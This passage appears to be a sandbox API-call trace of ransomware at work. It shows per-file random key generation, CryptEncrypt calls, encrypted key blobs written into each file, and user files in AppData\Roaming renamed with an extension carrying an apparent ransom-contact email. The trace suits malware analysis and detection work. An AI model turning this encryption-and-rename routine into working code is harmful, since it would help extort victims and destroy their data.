	[0105.953] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b3nfbalv.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.953] GetProcessHeap () returned 0x540000
	[0105.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.953] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=12292) returned 1
	[0105.953] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3004
	[0105.954] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.954] GetProcessHeap () returned 0x540000
	[0105.954] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.954] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.955] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.956] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.956] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.956] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x3004, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x3004, lpOverlapped=0x0) returned 1
	[0105.957] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.957] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.957] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3", dwFileAttributes=0x80) returned 1
	[0105.958] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3") returned 58
	[0105.958] GetProcessHeap () returned 0x540000
	[0105.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x603bd0
	[0105.958] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3"
	[0105.958] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.958] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9mli3b-.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9mli3b-.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.960] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9MLI3b-.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9mli3b-.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.960] GetProcessHeap () returned 0x540000
	[0105.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.960] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14167) returned 1
	[0105.960] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3757
	[0105.960] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.960] GetProcessHeap () returned 0x540000
	[0105.960] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.960] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.961] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.962] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.962] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.962] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x3757, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x3757, lpOverlapped=0x0) returned 1
	[0105.962] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-14167, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.962] WriteFile (in: hFile=0x50c, lpBuffer=0x60d318*, nNumberOfBytesToWrite=0x3757, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60d318*, lpNumberOfBytesWritten=0x3a1f778*=0x3757, lpOverlapped=0x0) returned 1
	[0105.962] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.962] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.962] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav", dwFileAttributes=0x80) returned 1
	[0105.963] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav") returned 64
	[0105.963] GetProcessHeap () returned 0x540000
	[0105.963] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x598b60
	[0105.963] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav"
	[0105.963] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.963] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8gazp5hkiuhlq.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8gazp5hkiuhlq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.966] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8gazP5HKiuHlq.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8gazp5hkiuhlq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.966] GetProcessHeap () returned 0x540000
	[0105.966] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0105.966] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=35503) returned 1
	[0105.966] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8aaf
	[0105.966] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.966] GetProcessHeap () returned 0x540000
	[0105.966] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.966] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.966] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.967] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.967] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.967] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x8aaf, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8aaf, lpOverlapped=0x0) returned 1
	[0105.968] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.968] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.968] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv", dwFileAttributes=0x80) returned 1
	[0105.969] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv") returned 70
	[0105.969] GetProcessHeap () returned 0x540000
	[0105.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x598b60
	[0105.969] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv"
	[0105.969] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.969] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8exy0qxj9hcbg9q9yp5.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8exy0qxj9hcbg9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.971] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8exY0qxj9hCBG9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8exy0qxj9hcbg9q9yp5.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.971] GetProcessHeap () returned 0x540000
	[0105.972] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0105.972] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=95916) returned 1
	[0105.972] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x176ac
	[0105.972] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.972] GetProcessHeap () returned 0x540000
	[0105.972] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.972] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.972] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.973] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.973] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.973] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x176ac, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x176ac, lpOverlapped=0x0) returned 1
	[0105.976] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.976] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.976] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp", dwFileAttributes=0x80) returned 1
	[0105.976] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp") returned 62
	[0105.977] GetProcessHeap () returned 0x540000
	[0105.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x56b300
	[0105.977] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp"
	[0105.977] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.977] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\79hhakdua2s.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\79hhakdua2s.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.980] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\79HHaKdUA2S.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\79hhakdua2s.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.980] GetProcessHeap () returned 0x540000
	[0105.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0105.980] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=75869) returned 1
	[0105.980] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1285d
	[0105.980] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.980] GetProcessHeap () returned 0x540000
	[0105.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.980] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.982] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.982] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.983] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.983] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x1285d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1285d, lpOverlapped=0x0) returned 1
	[0105.991] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.991] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.991] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf", dwFileAttributes=0x80) returned 1
	[0105.991] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf") returned 65
	[0105.991] GetProcessHeap () returned 0x540000
	[0105.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x56b300
	[0105.991] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf"
	[0105.991] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.991] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7 uqeom4hfc w5.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7 uqeom4hfc w5.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.994] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7 Uqeom4hFc w5.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7 uqeom4hfc w5.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.994] GetProcessHeap () returned 0x540000
	[0105.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0105.994] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=56014) returned 1
	[0105.994] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xdace
	[0105.995] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.995] GetProcessHeap () returned 0x540000
	[0105.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.995] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.996] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
